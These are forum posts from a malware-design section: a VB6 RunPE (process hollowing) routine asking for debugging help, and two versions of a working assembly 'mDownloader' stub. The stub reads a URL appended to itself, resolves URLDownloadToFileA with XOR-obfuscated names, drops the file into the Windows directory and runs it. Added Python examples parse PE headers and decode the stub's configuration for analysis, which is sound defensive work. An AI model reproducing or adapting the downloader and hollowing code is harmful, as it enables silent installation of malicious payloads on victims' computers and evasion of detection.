Computer Security / Malware Analysis and Design / Help creating a RunPE in VB6
on: 28 January 2011, 20:54
Well, I'm trying to learn how the Windows loader works and I've set out to write a RunPE, looking at how other ones work and so on after having read about the PE format several times, but I'm having problems: the NtUnmapViewOfSection API doesn't work correctly for me, nor does VirtualAllocEx, and I don't know why they don't work properly... the code I have is the following:

```vb
Option Explicit

Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Dest As Any, Src As Any, ByVal L As Long)
Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpAppName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function NtUnmapViewOfSection Lib "NTDLL.dll" (ByVal ProcessHandle As Long, ByVal BaseAddress As Long) As Long
Private Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long

Private Const CONTEXT_FULL As Long = &H10007
Private Const MAX_PATH As Integer = 260
Private Const CREATE_SUSPENDED As Long = &H4
Private Const MEM_COMMIT As Long = &H1000
Private Const MEM_RESERVE As Long = &H2000
Private Const PAGE_EXECUTE_READWRITE As Long = &H40

Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessId As Long
    dwThreadID As Long
End Type

Private Type STARTUPINFO
    cb As Long
    lpReserved As Long
    lpDesktop As Long
    lpTitle As Long
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

Private Type IMAGE_DOS_HEADER
    e_magic As Integer
    e_cblp As Integer
    e_cp As Integer
    e_crlc As Integer
    e_cparhdr As Integer
    e_minalloc As Integer
    e_maxalloc As Integer
    e_ss As Integer
    e_sp As Integer
    e_csum As Integer
    e_ip As Integer
    e_cs As Integer
    e_lfarlc As Integer
    e_ovno As Integer
    e_res(0 To 3) As Integer
    e_oemid As Integer
    e_oeminfo As Integer
    e_res2(0 To 9) As Integer
    e_lfanew As Long
End Type

Private Type IMAGE_FILE_HEADER
    Machine As Integer
    NumberOfSections As Integer
    TimeDateStamp As Long
    PointerToSymbolTable As Long
    NumberOfSymbols As Long
    SizeOfOptionalHeader As Integer
    characteristics As Integer
End Type

Private Type IMAGE_DATA_DIRECTORY
    VirtualAddress As Long
    Size As Long
End Type

Const IMAGE_NUMBEROF_DIRECTORY_ENTRIES = 16

Private Type IMAGE_OPTIONAL_HEADER
    Magic As Integer
    MajorLinkerVersion As Byte
    MinorLinkerVersion As Byte
    SizeOfCode As Long
    SizeOfInitializedData As Long
    SizeOfUnitializedData As Long
    AddressOfEntryPoint As Long
    BaseOfCode As Long
    BaseOfData As Long
    ImageBase As Long
    SectionAlignment As Long
    FileAlignment As Long
    MajorOperatingSystemVersion As Integer
    MinorOperatingSystemVersion As Integer
    MajorImageVersion As Integer
    MinorImageVersion As Integer
    MajorSubsystemVersion As Integer
    MinorSubsystemVersion As Integer
    W32VersionValue As Long
    SizeOfImage As Long
    SizeOfHeaders As Long
    CheckSum As Long
    SubSystem As Integer
    DllCharacteristics As Integer
    SizeOfStackReserve As Long
    SizeOfStackCommit As Long
    SizeOfHeapReserve As Long
    SizeOfHeapCommit As Long
    LoaderFlags As Long
    NumberOfRvaAndSizes As Long
    DataDirectory(0 To IMAGE_NUMBEROF_DIRECTORY_ENTRIES - 1) As IMAGE_DATA_DIRECTORY
End Type

Private Type IMAGE_NT_HEADERS
    Signature As Long
    FileHeader As IMAGE_FILE_HEADER
    OptionalHeader As IMAGE_OPTIONAL_HEADER
End Type

Const IMAGE_SIZEOF_SHORT_NAME = 8

Private Type IMAGE_SECTION_HEADER
    ' A fixed-length String inside a UDT is stored as Unicode in memory (16 bytes),
    ' which would misalign CopyMemory; a Byte array keeps the 8-byte layout of the PE
    SecName(0 To IMAGE_SIZEOF_SHORT_NAME - 1) As Byte
    VirtualSize As Long
    VirtualAddress As Long
    SizeOfRawData As Long
    PointerToRawData As Long
    PointerToRelocations As Long
    PointerToLinenumbers As Long
    NumberOfRelocations As Integer
    NumberOfLinenumbers As Integer
    characteristics As Long
End Type

Public Function EjecutarPE(ByVal Ruta As String) As Boolean
    On Error GoTo error
    Dim IDH As IMAGE_DOS_HEADER
    Dim INH As IMAGE_NT_HEADERS
    Dim ISH() As IMAGE_SECTION_HEADER
    Dim IDD As IMAGE_DATA_DIRECTORY
    Dim Datos() As Byte

    ' Read the whole file; FileLen bytes occupy indexes 0 to FileLen - 1
    ReDim Datos(FileLen(Ruta) - 1)
    Open Ruta For Binary As #1
    Get #1, , Datos
    Close #1

    ' DOS header at offset 0, NT headers at e_lfanew
    Call CopyMemory(IDH, Datos(0), Len(IDH))
    Call CopyMemory(INH, Datos(IDH.e_lfanew), Len(INH))

    Dim MYe_lfanew As Long: MYe_lfanew = IDH.e_lfanew
    Dim MYImageBase As Long: MYImageBase = INH.OptionalHeader.ImageBase
    Dim MYSizeOfImage As Long: MYSizeOfImage = INH.OptionalHeader.SizeOfImage
    Dim MYSizeOfHeaders As Long: MYSizeOfHeaders = INH.OptionalHeader.SizeOfHeaders
    Dim MYAddressOfEntryPoint As Long: MYAddressOfEntryPoint = INH.OptionalHeader.AddressOfEntryPoint
    Dim MYNumberOfSections As Integer: MYNumberOfSections = INH.FileHeader.NumberOfSections
    Dim MYVirtualAddress As Long
    Dim MYPointerToRawData As Long
    Dim MYSizeOfRawData As Long
    Dim ManijaProceso As Long
    Dim pi As PROCESS_INFORMATION
    Dim si As STARTUPINFO
    Dim NTUN As Long
    Dim Espacio As Long
    Dim IdProc As Long

    ' Start a copy of ourselves suspended. cb must be filled in, and lpCommandLine
    ' must be vbNullString (a literal 0 would be passed as the text "0")
    si.cb = Len(si)
    Call CreateProcessA(App.Path & "\" & App.EXEName & ".exe", vbNullString, 0, 0, 0, CREATE_SUSPENDED, 0, 0, si, pi)

    ' NtUnmapViewOfSection and VirtualAllocEx take the process HANDLE, not its id
    ManijaProceso = pi.hProcess
    NTUN = NtUnmapViewOfSection(ManijaProceso, MYImageBase)
    Espacio = VirtualAllocEx(ManijaProceso, MYImageBase, MYSizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE)
    Exit Function
error:
    EjecutarPE = False
End Function
```
I'd be grateful if someone could tell me what I'm doing wrong. Regards!
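Added example (mine, not code from the post or from the forum): a stand-alone PE32 header parser in Python that reads the same fields the VB6 routine copies out with CopyMemory, with the checks the routine never makes (MZ and PE signatures, the PE32 optional-header magic, and that every section's raw data actually lies inside the file), plus an RVA-to-file-offset lookup of the kind a loader needs before it can copy sections. The input is a minimal PE32 image constructed inline (two sections, a single RET at the entry point); it is not a real program, and its field values are assumptions chosen for the demonstration.

```python
"""Added example (not from the post): parse the PE32 headers the VB6 routine copies
with CopyMemory, with the checks it skips (MZ/PE signatures, PE32 magic, section raw
data inside the file). Input: a minimal PE32 image constructed below, not a real program."""
import struct
from typing import Optional

DOS_MAGIC, PE_SIGNATURE, OPT32_MAGIC = b"MZ", b"PE\0\0", 0x10B   # 0x20B would be PE32+
FILE_HEADER_FMT = "<HHIIIHH"                     # IMAGE_FILE_HEADER, 20 bytes
OPT32_FMT = "<HBBIIIIIIIIIHHHHHHIIIIHHIIIIII"    # IMAGE_OPTIONAL_HEADER32 before the data directories, 96 bytes
SECTION_FMT = "<8sIIIIIIHHI"                     # IMAGE_SECTION_HEADER, 40 bytes
OPT32_FIELDS = ("Magic", "MajorLinkerVersion", "MinorLinkerVersion", "SizeOfCode",
                "SizeOfInitializedData", "SizeOfUninitializedData", "AddressOfEntryPoint",
                "BaseOfCode", "BaseOfData", "ImageBase", "SectionAlignment", "FileAlignment",
                "MajorOperatingSystemVersion", "MinorOperatingSystemVersion", "MajorImageVersion",
                "MinorImageVersion", "MajorSubsystemVersion", "MinorSubsystemVersion",
                "Win32VersionValue", "SizeOfImage", "SizeOfHeaders", "CheckSum", "Subsystem",
                "DllCharacteristics", "SizeOfStackReserve", "SizeOfStackCommit",
                "SizeOfHeapReserve", "SizeOfHeapCommit", "LoaderFlags", "NumberOfRvaAndSizes")


def parse_pe32(data: bytes) -> dict:
    """Loader-relevant header fields plus the section table; ValueError on anything
    that would make a CopyMemory-style reader run off the end of its buffer."""
    if len(data) < 0x40 or data[:2] != DOS_MAGIC:
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]        # offset of the NT headers
    fh_off = e_lfanew + 4
    if fh_off + struct.calcsize(FILE_HEADER_FMT) > len(data):
        raise ValueError("e_lfanew points past the end of the file")
    if data[e_lfanew:fh_off] != PE_SIGNATURE:
        raise ValueError("missing PE signature")
    machine, nsections, _, _, _, size_opt, _ = struct.unpack_from(FILE_HEADER_FMT, data, fh_off)
    opt_off = fh_off + struct.calcsize(FILE_HEADER_FMT)
    if size_opt < struct.calcsize(OPT32_FMT) or opt_off + size_opt > len(data):
        raise ValueError("bad SizeOfOptionalHeader")
    opt = dict(zip(OPT32_FIELDS, struct.unpack_from(OPT32_FMT, data, opt_off)))
    if opt["Magic"] != OPT32_MAGIC:
        raise ValueError("not a PE32 image")
    sections = []
    for i in range(nsections):                                 # table follows the optional header
        off = opt_off + size_opt + i * struct.calcsize(SECTION_FMT)
        if off + struct.calcsize(SECTION_FMT) > len(data):
            raise ValueError("section table truncated")
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(SECTION_FMT, data, off)
        if rawptr + rawsize > len(data):                       # what a section copy relies on
            raise ValueError(f"section {i} raw data lies beyond the end of the file")
        if va + max(vsize, rawsize) > opt["SizeOfImage"]:
            raise ValueError(f"section {i} does not fit in SizeOfImage")
        sections.append({"Name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "VirtualAddress": va, "VirtualSize": vsize, "SizeOfRawData": rawsize,
                         "PointerToRawData": rawptr, "Characteristics": chars})
    return {"Machine": machine, "e_lfanew": e_lfanew, "ImageBase": opt["ImageBase"],
            "SizeOfImage": opt["SizeOfImage"], "SizeOfHeaders": opt["SizeOfHeaders"],
            "AddressOfEntryPoint": opt["AddressOfEntryPoint"],
            "NumberOfSections": nsections, "Sections": sections}


def rva_to_file_offset(pe: dict, rva: int) -> Optional[int]:
    """Map an RVA (e.g. AddressOfEntryPoint) to the file offset holding its bytes;
    None if it falls outside every section or in a section's zero-filled tail."""
    for s in pe["Sections"]:
        span = max(s["VirtualSize"], s["SizeOfRawData"])
        if s["VirtualAddress"] <= rva < s["VirtualAddress"] + span:
            delta = rva - s["VirtualAddress"]
            return s["PointerToRawData"] + delta if delta < s["SizeOfRawData"] else None
    return None


def build_sample_pe() -> bytes:
    """Constructed minimal PE32 for the demo: two sections, entry point = one RET."""
    file_align, sect_align = 0x200, 0x1000
    # (name, VirtualAddress, VirtualSize, PointerToRawData, SizeOfRawData, Characteristics)
    secs = [(b".text", 0x1000, 0x10, 0x200, 0x200, 0x60000020),   # code, r-x
            (b".data", 0x2000, 0x04, 0x400, 0x200, 0xC0000040)]   # data, rw-
    dos = DOS_MAGIC + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    file_hdr = struct.pack(FILE_HEADER_FMT, 0x14C, len(secs), 0, 0, 0, 96 + 16 * 8, 0x0102)
    opt = struct.pack(OPT32_FMT, OPT32_MAGIC, 0, 0, 0x200, 0x200, 0, 0x1000, 0x1000, 0x2000,
                      0x400000, sect_align, file_align, 4, 0, 0, 0, 4, 0, 0, 0x3000, file_align,
                      0, 2, 0, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16) + b"\0" * (16 * 8)
    sec_tab = b"".join(struct.pack(SECTION_FMT, n, vs, va, rs, rp, 0, 0, 0, 0, ch)
                       for n, va, vs, rp, rs, ch in secs)
    headers = (dos + PE_SIGNATURE + file_hdr + opt + sec_tab).ljust(file_align, b"\0")
    return headers + b"\xC3".ljust(0x200, b"\0") + b"\x01\x02\x03\x04".ljust(0x200, b"\0")


if __name__ == "__main__":
    pe = parse_pe32(build_sample_pe())
    print(f"ImageBase=0x{pe['ImageBase']:X} SizeOfImage=0x{pe['SizeOfImage']:X} "
          f"EntryPoint=0x{pe['AddressOfEntryPoint']:X} -> file offset "
          f"0x{rva_to_file_offset(pe, pe['AddressOfEntryPoint']):X}")
```

Running the file prints the headers of the constructed image. parse_pe32 raises ValueError on a truncated or malformed file instead of reading past the end of the buffer, which is the failure a CopyMemory-based reader hits silently when it trusts e_lfanew, SizeOfOptionalHeader or PointerToRawData straight from the file.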
Computer Security / Malware Analysis and Design / Re: mDownloader
on: 16 December 2010, 17:09
Well, here is the improved code:

```asm
include 'win32ax.inc'

.data
  manija   dd ?                          ; file handle
  larchivo dd ?                          ; file size
  espacio  dd ?                          ; file buffer, later pointer to the URL
  bleidos  dd ?                          ; bytes read
  dll      db 'rukjhi)ckk',0             ; 'urlmon.dll' XORed with 7
  funcion  db 'RUKChpikhfcShAnkbF',0     ; 'URLDownloadToFileA' XORed with 7
  añadir   db '%windir%\archivo.exe',0
  ruta     dd ?

.code
start:
  ; own image path straight from the PEB instead of GetModuleFileName:
  ; PEB -> ProcessParameters (+0x10) -> ImagePathName.Buffer (+0x3C), a wide string
  xor eax,eax
  mov eax,[fs:eax+0x30]
  mov eax,[eax+0x10]
  mov eax,[eax+0x3C]
  invoke CreateFileW,eax,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0
  mov [manija],eax
  invoke GetFileSize,[manija],0
  mov [larchivo],eax
  invoke GlobalAlloc,GPTR,[larchivo]
  mov [espacio],eax
  invoke ReadFile,[manija],[espacio],[larchivo],addr bleidos,0
  invoke CloseHandle,[manija]

  ; look for the '###' separator; the URL starts right after it
  mov ecx,1
  mov eax,[espacio]
bucle:
  .if ecx >= [larchivo]                  ; stay inside the buffer (the original compared
    jmp salir                            ; against larchivo+10 and could read past it)
  .endif
  .if byte [eax+ecx] = '#'
    inc ecx
    .if byte [eax+ecx] = '#'
      inc ecx
      .if byte [eax+ecx] = '#'
        inc ecx
        add eax,ecx                      ; eax -> first byte after the separator
        mov [espacio],eax
        jmp salir
      .endif
      dec ecx
    .endif
    dec ecx
  .endif
  inc ecx
  jmp bucle
salir:
  ; destination path: expand %windir%\archivo.exe
  invoke GlobalAlloc,GPTR,1024
  mov [ruta],eax
  invoke ExpandEnvironmentStrings,añadir,[ruta],1024

  ; decode the two strings in place (Cifrar returns their address in eax)
  ; and resolve URLDownloadToFileA without importing it
  stdcall Cifrar,dll
  invoke LoadLibrary,eax
  push eax
  stdcall Cifrar,funcion
  mov ecx,eax
  pop eax
  invoke GetProcAddress,eax,ecx

  ; URLDownloadToFileA(NULL, url, path, 0, NULL)
  push 0
  push 0
  push [ruta]
  push [espacio]
  push 0
  call eax
  invoke ShellExecute,0,"open",[ruta],0,0,0
  invoke ExitProcess,0                   ; the original ended with leave/ret without a frame set up

; XOR every byte of the string with 7, in place; returns the string address in eax
proc Cifrar,Cadena
  xor ecx,ecx
  mov eax,[Cadena]
.bucle:
  .if byte [eax+ecx] = 0
    jmp .salir
  .endif
  xor byte [eax+ecx],7
  inc ecx
  jmp .bucle
.salir:
  ret
endp

.end start
```
I had read about the PEB structure and I had seen that code of yours in another post by yst, if I remember correctly.. XD Well, I haven't improved the search for the separator signature because I think this way it fits better what I want, and I can add a signature of whatever length I want. Regards!
Computer Security / Malware Analysis and Design / mDownloader
on: 15 December 2010, 20:31
Well, here I bring you the code of a downloader I've written in fasm; I'm only posting the code of the stub, which is the interesting part, hehe.

```asm
; mDownloader stub
; Coded by Drinky94 in December 2010
; www.drinky94. artehack .net
include 'win32ax.inc'

.data
  ruta     dd ?                          ; buffer for our own path
  manija   dd ?                          ; file handle
  larchivo dd ?                          ; file size
  espacio  dd ?                          ; file buffer, later pointer to the URL
  bleidos  dd ?                          ; bytes read
  dll      db 'urlmon.dll',0
  funcion  db 'URLDownloadToFileA',0
  mUrl     dd ?
  dlls     db 'msvcrt.dll',0
  funcions db 'getenv',0
  shell    dd ?
  user     db 'windir',0
  añadir   db '\archivo.exe',0
  destino  dd ?

.code
start:
  ; read our own executable into memory
  invoke GlobalAlloc,GPTR,1024
  mov [ruta],eax
  invoke GetModuleFileName,0,[ruta],1024
  invoke CreateFile,[ruta],GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0
  mov [manija],eax
  invoke GetFileSize,[manija],0
  mov [larchivo],eax
  invoke GlobalAlloc,GPTR,[larchivo]
  mov [espacio],eax
  invoke ReadFile,[manija],[espacio],[larchivo],addr bleidos,0
  invoke CloseHandle,[manija]

  ; look for the '###' separator; the URL starts right after it
  mov ecx,1
  mov eax,[espacio]
bucle:
  .if ecx >= [larchivo]                  ; stay inside the buffer (the original compared
    jmp salir                            ; against larchivo+10 and could read past it)
  .endif
  .if byte [eax+ecx] = '#'
    inc ecx
    .if byte [eax+ecx] = '#'
      inc ecx
      .if byte [eax+ecx] = '#'
        inc ecx
        add eax,ecx                      ; eax -> first byte after the separator
        mov [espacio],eax
        jmp salir
      .endif
      dec ecx
    .endif
    dec ecx
  .endif
  inc ecx
  jmp bucle
salir:
  ; destination: %windir%\archivo.exe, built with msvcrt's getenv
  invoke LoadLibrary,dlls
  invoke GetProcAddress,eax,funcions
  mov [shell],eax
  push user
  call [shell]
  add esp,4                              ; getenv is cdecl: the caller removes the argument
  invoke lstrcat,eax,añadir
  mov [destino],eax

  ; resolve URLDownloadToFileA at run time and call it: (NULL, url, path, 0, NULL)
  invoke LoadLibrary,dll
  invoke GetProcAddress,eax,funcion
  mov [mUrl],eax
  push 0
  push 0
  push [destino]
  push [espacio]
  push 0
  call [mUrl]
  invoke ShellExecute,0,"open",[destino],0,0,0
  invoke ExitProcess,0                   ; the original ended with leave/ret without a frame set up
.end start
```
I hope it's useful to someone. Regards!
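Added example (mine, not code from either mDownloader post): the analysis side of the stub, in Python. It recovers the URL appended after the '###' separator the way the stub's 'bucle' loop does, handles the case the stub does not (no separator present), brute-forces the single-byte XOR key used by the 'Cifrar' routine of the improved version, and decodes the two obfuscated strings from that post ('rukjhi)ckk' and 'RUKChpikhfcShAnkbF'). The stub image it works on is constructed inline (a fake MZ header, those strings, and an appended separator plus URL); the URL under example.invalid is a placeholder, and the separator is a parameter because the author says its length is arbitrary.

```python
"""Added example (not code from either post): analyst-side recovery of the
mDownloader stub's configuration. The stub image below is constructed, not a
real binary; the two obfuscated strings are taken verbatim from the second post."""
from typing import Optional

XOR_KEY = 7                                    # the key the posted Cifrar routine uses
OBF_DLL = b"rukjhi)ckk"                        # .data strings as they appear in the post
OBF_API = b"RUKChpikhfcShAnkbF"


def xor_bytes(data: bytes, key: int) -> bytes:
    """Cifrar is its own inverse: XOR every byte with the single-byte key."""
    return bytes(b ^ key for b in data)


def payload_after_marker(blob: bytes, marker: bytes = b"###") -> Optional[bytes]:
    """The C string following the first marker, as the stub's scan computes it.
    The stub hands the bytes after the marker straight to URLDownloadToFileA, so
    the string ends at the first NUL (or at end of file if none was appended).
    Returns None when the marker is absent; the stub has no such check and would
    pass the start of its own file to the API."""
    pos = blob.find(marker)
    if pos < 0:
        return None
    start = pos + len(marker)
    end = blob.find(b"\0", start)
    return blob[start:] if end < 0 else blob[start:end]


def recover_xor_key(obfuscated: bytes, suffix: bytes = b".dll") -> Optional[int]:
    """Single-byte XOR leaves 255 candidates; keep the one whose output is
    printable ASCII and ends in the expected suffix (a DLL name is the easiest anchor)."""
    for key in range(1, 256):
        plain = xor_bytes(obfuscated, key)
        if plain.endswith(suffix) and all(0x20 <= b < 0x7F for b in plain):
            return key
    return None


def build_stub_image(url: bytes, marker: bytes = b"###") -> bytes:
    """Constructed stand-in for stub.exe plus the appended config; not a real PE."""
    data_section = OBF_DLL + b"\0" + OBF_API + b"\0" + b"%windir%\\archivo.exe\0"
    body = b"MZ" + b"\0" * 62 + data_section + b"\0" * 64
    return body + marker + url + b"\0"          # what a builder appends to the stub


def analyse_stub(blob: bytes, marker: bytes = b"###") -> dict:
    """Walk the NUL-separated strings, find the one that XOR-decodes to a DLL name,
    and decode the string that follows it (the API name) with the same key."""
    result = {"url": payload_after_marker(blob, marker), "xor_key": None, "dll": None, "api": None}
    chunks = [c for c in blob.split(b"\0") if len(c) >= 5]
    for i, chunk in enumerate(chunks):
        key = recover_xor_key(chunk)
        if key is not None:
            result["xor_key"] = key
            result["dll"] = xor_bytes(chunk, key).decode("ascii")
            if i + 1 < len(chunks):
                result["api"] = xor_bytes(chunks[i + 1], key).decode("ascii", "replace")
            break
    return result


if __name__ == "__main__":
    sample = build_stub_image(b"http://example.invalid/archivo.exe")
    print(analyse_stub(sample))
```

The scan stops at the first occurrence of the separator, exactly like the stub: if the stub's own code or data ever contained '###', the loop would stop there rather than at the appended configuration, which is the practical reason for a longer or less common signature.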